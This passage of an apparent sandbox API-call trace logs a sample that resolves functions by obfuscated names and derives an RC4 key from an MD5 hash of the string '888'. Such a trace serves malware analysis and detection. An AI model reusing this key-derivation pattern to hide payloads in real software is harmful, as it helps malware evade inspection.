lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0200.137] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.137] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0200.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.138] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0200.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0200.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.138] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.138] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.138] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.138] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.138] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.138] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.138] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0200.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.139] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.140] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0200.140] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.140] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.141] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0200.141] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.141] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0200.141] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.141] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.141] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.141] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.141] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.141] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0200.141] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.141] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0200.141] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.141] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.142] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaadb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0200.142] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.142] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.143] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.143] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.143] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.143] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0200.143] CryptHashData (hHash=0x9e2078, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.143] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.143] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.143] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.143] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.144] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.144] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.144] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.144] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0200.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaad50, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0200.144] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.144] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.144] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.144] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.144] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.144] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0200.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0200.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0200.145] CryptDestroyHash (hHash=0x9e2078) returned 1 [0200.145] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 